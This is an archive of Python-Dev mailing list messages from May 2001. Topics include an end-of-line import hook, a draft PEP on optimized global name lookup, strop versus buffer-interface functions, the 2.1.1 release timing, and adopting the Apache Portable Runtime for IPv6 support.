> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward@python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger@bigfoot.com  Thu May 24 02:04:46 2001
From: dgoodger@bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked sround but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger@bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger@bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()


From jeremy@alum.mit.edu  Thu May 24 02:10:55 2001
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy@digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names.

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxillary data structures
    to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other module's
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
    def __init__(self, names):
        assert isinstance(names, types.DictType)
        self.names = {}
        self.list = [None] * size
        self.empty = [1] * size
        self.dict = {}
        self.size = 0

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            self.empty[i] = None
            self.list[i] = val
            self.size += 1

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def keys(self):
        if self.dict:
            return self.names.keys() + self.dict.keys()
        else:
            return self.names.keys()

    def values(self):
        if self.dict:
            return self.names.values() + self.dict.values()
        else:
            return self.names.values()

    def items(self):
        if self.dict:
            return self.names.items()
        else:
            return self.names.items() + self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.empty[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None

    def update(self):
        pass

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        self.empty[index] = 1
        self.list[index] = None


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
    was defined in.  (Not sure if there are some subtle problems with
    this.)

Enhancement: Optimized access to other module's globals

    If one module imports another and binds a name in the global
    namespace, the compiler currently detects that the particular
    global is bound to a module.  The compiler also note access to any
    attribute of a module, and emit special opcodes for accessing
    these names.

    At runtime the implementation can lookup the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in the dlict.  This would allow names,
    e.g. types.StringType, to be used with the same efficiency as
    globals. 

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 

    These mechanisms would have little if any cost for the common case
    whether a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry@digicool.com  Thu May 24 03:46:30 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
 <15116.8966.324136.897953@anthem.wooz.org>
 <20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr@thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one who's skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr@thyrsus.com  Thu May 24 04:04:58 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one who's skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry@digicool.com  Thu May 24 04:14:07 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
 <15116.8966.324136.897953@anthem.wooz.org>
 <20010523183949.A19251@thyrsus.com>
 <15116.30214.900667.624573@anthem.wooz.org>
 <20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr@thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles "I Wanna Hold Your Head" before being itself
displaced by the The Bee Gee's "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr@thyrsus.com  Thu May 24 04:31:42 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz@rahul.net  Thu May 24 05:59:37 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein@lyra.org  Thu May 24 09:33:49 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for to those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 09:52:58 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <20010524015258.Z5402@lyra.org>

On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote:
> What's out IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

Radical suggestion:

  Toss out a ton of the platform-specific stuff in Python and use the Apache
  Portable Runtime (APR). It has IPv6 in it, but it could also help with
  loading shared libraries, threading, mmap'd files, sockets, etc.

(it won't replace *all* of Python's platform specific stuff; I think Python
 has more coverage than APR does)

Could simplify a number of things for Python, and reduce some of the
maintenance costs...

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From thomas@xs4all.net  Thu May 24 10:01:52 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 11:01:52 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100
References: <20010523160025.B690@xs4all.nl> <m3u22bjiz6.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <20010524110152.Q676@xs4all.nl>

[ Answer CC'd to python-dev since it deserves an official answer :) ]

On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote:
> For summarasing purposes, do you have any idea when Python 2.1.1 will
> be released?

> "No" is a perfectly acceptable answer.

Then "No" it is ! Even though I have a fair bit of patches in the queue
right now, I need some more time to check out (no pun intended) the changes
since the fork, and I want to browse the bug list for possible bugs that
should be checked out and fixed for 2.1.1. Another couple of weeks at least,
before a release candidate. It also depends on Moshe; if he actually
releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Thu May 24 11:18:50 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 12:18:50 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org>
Message-ID: <3B0CE00A.488C8D73@lemburg.com>

Greg Stein wrote:
> 
> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> > Update of /cvsroot/python/python/dist/src/Modules
> > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> >
> > Modified Files:
> >       stropmodule.c
> > Log Message:
> > Add warnings to the strop module, for to those functions that really
> > *are* obsolete; three variables and the maketrans() function are not
> > (yet) obsolete.
> >
> > Add a compensating warnings.filterwarnings() call to test_strop.py.
> >
> > Add this to the NEWS.
> 
> Something that I ran into the other day...
> 
> >>> ob = some_object_implementing_the_buffer_interface
> >>> string.find(ob, '.')
> (fails because ob does not define the .find method)
> >>> strop.find(ob, '.')
> (succeeds)
> 
> The point is that strop uses the t# to get a ptr/len pair to do its work.
> Thus, it can work on many things that export the buffer interface. Dropping
> strop means we no longer have many of those functions. Instead, the
> functionality must be copied to *every* object that implements the buffer
> interface.
> 
> We can say ob.find() now, but we can't say find(ob) any longer. And saying
> that all objects (which implement the buffer API) must now implement a bunch
> of "standard" methods is awfully burdensome.
> 
> In my particular case, I was trying to do a find on a BufferObject referring
> to a subset of another object. Blam. No good. Thankfully, when I did a
> find() on a mmap object, it worked simply because mmaps happen to define a
> .find method.
> 
> [ of course, the find method on an mmap was totally broken, but I checked in
>   a fix for that (last week or so) ]
> 
> So... my question is: is there any way that we can retain a generic find()
> (and similar functions from the string/strop module) that operates on any
> type that implements the buffer API?
> 
> Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> implements some standard methods for 8-bit character data (using the buffer
> API), which can be mixed into new Python types" That would reduce the burden
> for new types.

I suppose that in 2.2 we'll be able to build a class/type
hierarchy which then provides these possibilities. I haven't
followed Guido's latest checkins closely though -- could be that
types don't support multiple inheritence.

BTW, wouldn't it suffice to add these methods to buffer objects ?
Then you could write: buffer(ob).find('.').

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry@digicool.com  Thu May 24 12:50:34 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 24 May 2001 07:50:34 -0400
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
 <20010524015258.Z5402@lyra.org>
Message-ID: <15116.62858.720241.46017@anthem.wooz.org>

>>>>> "GS" == Greg Stein <gstein@lyra.org> writes:

    GS>   Toss out a ton of the platform-specific stuff in Python and
    GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
    GS> it could also help with loading shared libraries, threading,
    GS> mmap'd files, sockets, etc.

I don't know squat about APR, but would it have to be either-or?  IOW,
would it be possible to wrap the APR in a module (or package) and
provide it as an importable alternative?

-Barry


From mal@lemburg.com  Thu May 24 13:22:42 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 14:22:42 +0200
Subject: [Python-Dev] IPv6
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
 <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org>
Message-ID: <3B0CFD12.164271D8@lemburg.com>

"Barry A. Warsaw" wrote:
> 
> >>>>> "GS" == Greg Stein <gstein@lyra.org> writes:
> 
>     GS>   Toss out a ton of the platform-specific stuff in Python and
>     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
>     GS> it could also help with loading shared libraries, threading,
>     GS> mmap'd files, sockets, etc.
> 
> I don't know squat about APR, but would it have to be either-or?  IOW,
> would it be possible to wrap the APR in a module (or package) and
> provide it as an importable alternative?

Should be possible; the problem is: how do you get the APR types
to interact with the original Python ones (e.g. file types). Many
low-level Python functions require the native Python types, so
while wrapping APR as Python module would provide an alternative, that
alternative will most probably not help much w/r to simplifying
portability issues.

FYI, here's what the APR has to offer (taken from the APRDesign
file that comes with Apache 2.0 beta):
"""
The base types in APR
file_io     File I/O, including pipes
lib         A portable library originally used in Apache.  This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)   
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time 
"""

It currently supports: Unix (includes BeOS), Win32 and OS/2.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gstein@lyra.org  Thu May 24 13:55:55 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 05:55:55 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200
References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com>
Message-ID: <20010524055555.B5402@lyra.org>

On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote:
> "Barry A. Warsaw" wrote:
> > >>>>> "GS" == Greg Stein <gstein@lyra.org> writes:
> > 
> >     GS>   Toss out a ton of the platform-specific stuff in Python and
> >     GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but
> >     GS> it could also help with loading shared libraries, threading,
> >     GS> mmap'd files, sockets, etc.
> > 
> > I don't know squat about APR, but would it have to be either-or?  IOW,
> > would it be possible to wrap the APR in a module (or package) and
> > provide it as an importable alternative?

Sure, that is a possibility, but it doesn't save Python much in terms of
maintenance or portability. "Just another library"

Truly using it could certainly be done as a slow migration, and it is
definitely possible to only use portions, subsets, etc. Another alternative
would be to use APR as a "platform target". But that just adds yet another
platform to support rather than simplifying.

> Should be possible; the problem is: how do you get the APR types
> to interact with the original Python ones (e.g. file types). Many

The header is a total misnomer, but "apr_portable.h" provides access to an
opaque type's underlying native object (many of us aren't sure how Ryan
arrived at "portable" being the name for the least-portable aspect of the
library :-). Anyways... you can extract a file descriptor from a file or
socket or pipe. Or a thread ID from an thread object. etc.

> low-level Python functions require the native Python types, so
> while wrapping APR as Python module would provide an alternative, that
> alternative will most probably not help much w/r to simplifying
> portability issues.

Right. I'd say use the APR functions unless absolute speed is required (such
as the readlines stuff). But you could also argue that the hard-core
platform specific optimizations could go into APR itself, so that Python
doesn't have to worry about them.

> FYI, here's what the APR has to offer (taken from the APRDesign
> file that comes with Apache 2.0 beta):
> """
> The base types in APR
> file_io     File I/O, including pipes
> lib         A portable library originally used in Apache.  This contains
>             memory management, tables, and arrays.
> locks       Mutex and reader/writer locks
> misc        Any APR type which doesn't have any other place to belong
> network_io  Network I/O
> shmem       Shared Memory (Not currently implemented)   
> signal      Asynchronous Signals
> threadproc  Threads and Processes
> time        Time 
> """

That doc is out of date; the list is missing: shared library handling, i18n,
mmap, user information access (e.g. getpwnam), uuid handling, getopt
replacements, cryptographic random data, and a few other bits here and
there. The shared mem actually is implemented mostly, via the libmm library.

And note that some of those topics have some nice depth. As I mentioned,
network_io supports IPv6, but also portable name lookups, sendfile(), etc.
The file_io stuff support optimized stat() and opendir-type calls for the
platform.

> It currently supports: Unix (includes BeOS), Win32 and OS/2.

A lot more than that :-)  Pretty much all the Unix variants, including
OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. 

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 14:00:16 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:00:16 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <20010524060016.D5402@lyra.org>

On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> Greg Stein wrote:
>...
> > So... my question is: is there any way that we can retain a generic find()
> > (and similar functions from the string/strop module) that operates on any
> > type that implements the buffer API?
> > 
> > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > implements some standard methods for 8-bit character data (using the buffer
> > API), which can be mixed into new Python types" That would reduce the burden
> > for new types.
> 
> I suppose that in 2.2 we'll be able to build a class/type
> hierarchy which then provides these possibilities. I haven't
> followed Guido's latest checkins closely though -- could be that
> types don't support multiple inheritence.

No idea either... that's why I asked.

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

You're totally missing the point with that suggestion. It does *not* suffice
to add them to buffer objects. What about array objects? mmap objects?
Random Joe Object who implements the buffer interface?

All of those are out of luck.

With strop, I can pass any of those objects to strop.find(). That function
has a polymorphic argument.

In the current arrangement, every object must implement their own .find and
.upper and .whatever.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mwh@python.net  Thu May 24 14:02:34 2001
From: mwh@python.net (Michael Hudson)
Date: Thu, 24 May 2001 14:02:34 +0100 (BST)
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <20010524055555.B5402@lyra.org>
Message-ID: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>

I can't think of a good way of expressing this, but I don't think we
should try to make writing non cross-platform code in Python impossible.
Yes, it should be easy to write x-platform code, but if there's some very
specific platform trick I can do with, say, setsockopt, I don't want
Python to hide it from me just 'cause it doesn't work on VMS.

Maybe this isn't an issue here.

On Thu, 24 May 2001, Greg Stein wrote:
[...]
> That doc is out of date; the list is missing: shared library handling, i18n,
> mmap, user information access (e.g. getpwnam), uuid handling, getopt
> replacements, cryptographic random data, and a few other bits here and
> there. The shared mem actually is implemented mostly, via the libmm library.

How big is APR?  How stable?  (in terms of interface; I'm assuming it
doesn't crap out through bad programming or it'd be a non-starter)

> And note that some of those topics have some nice depth. As I mentioned,
> network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> The file_io stuff support optimized stat() and opendir-type calls for the
> platform.
>
> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>
> A lot more than that :-)  Pretty much all the Unix variants, including
> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
Playstation 2(!), from looking at
http://www.python.org/download/download_other.html.

Cheers,
M.


From gstein@lyra.org  Thu May 24 14:59:21 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
